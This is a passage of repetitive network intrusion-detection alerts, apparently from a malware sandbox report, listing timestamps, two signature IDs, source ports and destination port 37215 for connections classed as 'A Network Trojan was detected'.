          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810441
          SID:2829579
          Source Port:52952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021948
          SID:2829579
          Source Port:37152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129300
          SID:2829579
          Source Port:51022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783197
          SID:2835222
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294733
          SID:2835222
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401551
          SID:2829579
          Source Port:56166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743020
          SID:2829579
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037168
          SID:2829579
          Source Port:51478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075525
          SID:2829579
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601881
          SID:2829579
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600776
          SID:2829579
          Source Port:54824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788922
          SID:2829579
          Source Port:49760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405962
          SID:2829579
          Source Port:53950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157484
          SID:2835222
          Source Port:56920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107490
          SID:2835222
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883838
          SID:2835222
          Source Port:48572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041937
          SID:2829579
          Source Port:57454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468883
          SID:2829579
          Source Port:44798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841848
          SID:2829579
          Source Port:35450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005470
          SID:2835222
          Source Port:34452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.118563
          SID:2835222
          Source Port:54070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891964
          SID:2835222
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709284
          SID:2829579
          Source Port:59156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738502
          SID:2829579
          Source Port:35896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884513
          SID:2829579
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734516
          SID:2835222
          Source Port:36942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239084
          SID:2829579
          Source Port:59674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174764
          SID:2835222
          Source Port:51030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306570
          SID:2835222
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855256
          SID:2829579
          Source Port:55368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789016
          SID:2829579
          Source Port:50882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817462
          SID:2835222
          Source Port:60932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792823
          SID:2835222
          Source Port:53402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306402
          SID:2829579
          Source Port:59270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887708
          SID:2829579
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407915
          SID:2829579
          Source Port:37634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270549
          SID:2835222
          Source Port:48710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161797
          SID:2835222
          Source Port:34888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731245
          SID:2835222
          Source Port:35594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173492
          SID:2829579
          Source Port:60662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405887
          SID:2829579
          Source Port:37934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262412
          SID:2835222
          Source Port:44608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266154
          SID:2829579
          Source Port:54930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180423
          SID:2835222
          Source Port:60892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892700
          SID:2829579
          Source Port:51488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172783
          SID:2835222
          Source Port:51296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846109
          SID:2829579
          Source Port:52032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274244
          SID:2835222
          Source Port:57696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668256
          SID:2829579
          Source Port:45354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108934
          SID:2829579
          Source Port:50648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407071
          SID:2829579
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891112
          SID:2829579
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176381
          SID:2835222
          Source Port:57162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731485
          SID:2835222
          Source Port:57638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113346
          SID:2829579
          Source Port:45496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155836
          SID:2829579
          Source Port:55614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129265
          SID:2829579
          Source Port:41278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160434
          SID:2835222
          Source Port:34446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044990
          SID:2835222
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151403
          SID:2835222
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160610
          SID:2835222
          Source Port:32798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512716
          SID:2835222
          Source Port:49528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259110
          SID:2835222
          Source Port:49646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175627
          SID:2835222
          Source Port:33508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820598
          SID:2835222
          Source Port:53202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739726
          SID:2835222
          Source Port:46002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816741
          SID:2829579
          Source Port:35924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462492
          SID:2829579
          Source Port:48140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351409
          SID:2829579
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709206
          SID:2829579
          Source Port:60224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788430
          SID:2829579
          Source Port:44004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129542
          SID:2835222
          Source Port:46482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781330
          SID:2835222
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352600
          SID:2835222
          Source Port:50210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805842
          SID:2829579
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160234
          SID:2835222
          Source Port:44882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673007
          SID:2835222
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353174
          SID:2829579
          Source Port:60124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258028
          SID:2829579
          Source Port:53368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509790
          SID:2829579
          Source Port:36670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161137
          SID:2835222
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2835222
          Source Port:49454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853043
          SID:2835222
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893641
          SID:2829579
          Source Port:56942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704498
          SID:2829579
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911332
          SID:2829579
          Source Port:43680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107697
          SID:2829579
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859444
          SID:2829579
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542784
          SID:2835222
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395124
          SID:2835222
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446686
          SID:2835222
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112690
          SID:2829579
          Source Port:50796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671269
          SID:2835222
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738416
          SID:2835222
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257224
          SID:2829579
          Source Port:35370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407355
          SID:2835222
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188040
          SID:2829579
          Source Port:38814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740117
          SID:2829579
          Source Port:39536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059495
          SID:2835222
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128162
          SID:2835222
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.821805
          SID:2835222
          Source Port:35152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146361
          SID:2829579
          Source Port:59540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599640
          SID:2835222
          Source Port:35626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019527
          SID:2835222
          Source Port:56272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402100
          SID:2835222
          Source Port:51120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549974
          SID:2835222
          Source Port:55900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063068
          SID:2835222
          Source Port:49168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707436
          SID:2829579
          Source Port:55970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126771
          SID:2835222
          Source Port:52632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115225
          SID:2835222
          Source Port:39200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107680
          SID:2835222
          Source Port:40862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063138
          SID:2829579
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085427
          SID:2835222
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107452
          SID:2835222
          Source Port:42212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549867
          SID:2835222
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549878
          SID:2829579
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884153
          SID:2829579
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178469
          SID:2829579
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708222
          SID:2829579
          Source Port:35156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732813
          SID:2829579
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159038
          SID:2829579
          Source Port:53536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788384
          SID:2835222
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444367
          SID:2829579
          Source Port:50142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884429
          SID:2835222
          Source Port:37330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742851
          SID:2829579
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378523
          SID:2829579
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466599
          SID:2829579
          Source Port:56840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812650
          SID:2835222
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792679
          SID:2829579
          Source Port:56774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238629
          SID:2835222
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911250
          SID:2835222
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355990
          SID:2835222
          Source Port:45376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173003
          SID:2835222
          Source Port:52138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.797525
          SID:2829579
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668256
          SID:2835222
          Source Port:43264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262883
          SID:2829579
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019468
          SID:2835222
          Source Port:42304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163187
          SID:2829579
          Source Port:47420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855410
          SID:2829579
          Source Port:44454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109163
          SID:2835222
          Source Port:51804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087380
          SID:2829579
          Source Port:41936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462899
          SID:2835222
          Source Port:58308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351541
          SID:2835222
          Source Port:39700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744095
          SID:2829579
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784508
          SID:2835222
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352037
          SID:2835222
          Source Port:38360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895746
          SID:2829579
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260776
          SID:2835222
          Source Port:42614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175631
          SID:2829579
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801182
          SID:2829579
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463355
          SID:2829579
          Source Port:50654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729709
          SID:2829579
          Source Port:48410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354178
          SID:2829579
          Source Port:48058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176797
          SID:2829579
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673766
          SID:2829579
          Source Port:54106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059873
          SID:2835222
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155691
          SID:2829579
          Source Port:45116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462062
          SID:2835222
          Source Port:38358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841994
          SID:2835222
          Source Port:37664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792817
          SID:2835222
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855172
          SID:2829579
          Source Port:58884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599511
          SID:2835222
          Source Port:58418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157614
          SID:2835222
          Source Port:38576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511864
          SID:2829579
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600777
          SID:2829579
          Source Port:55618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739133
          SID:2829579
          Source Port:55774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173168
          SID:2829579
          Source Port:43214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353163
          SID:2835222
          Source Port:46512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353058
          SID:2835222
          Source Port:52590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133936
          SID:2835222
          Source Port:52288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891377
          SID:2829579
          Source Port:39768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113675
          SID:2829579
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159325
          SID:2835222
          Source Port:45386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860236
          SID:2829579
          Source Port:58518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896753
          SID:2829579
          Source Port:50884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672785
          SID:2829579
          Source Port:50972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353545
          SID:2835222
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128648
          SID:2829579
          Source Port:53244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897398
          SID:2829579
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542286
          SID:2829579
          Source Port:33984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019172
          SID:2835222
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884493
          SID:2829579
          Source Port:50896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513508
          SID:2829579
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884381
          SID:2829579
          Source Port:54756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545568
          SID:2829579
          Source Port:60470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601428
          SID:2829579
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158714
          SID:2829579
          Source Port:33902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241706
          SID:2835222
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466311
          SID:2829579
          Source Port:47838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730190
          SID:2835222
          Source Port:55914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108162
          SID:2835222
          Source Port:47534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239582
          SID:2829579
          Source Port:57336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671686
          SID:2829579
          Source Port:43504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466311
          SID:2829579
          Source Port:59510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264677
          SID:2835222
          Source Port:34892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269290
          SID:2829579
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667122
          SID:2829579
          Source Port:53260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
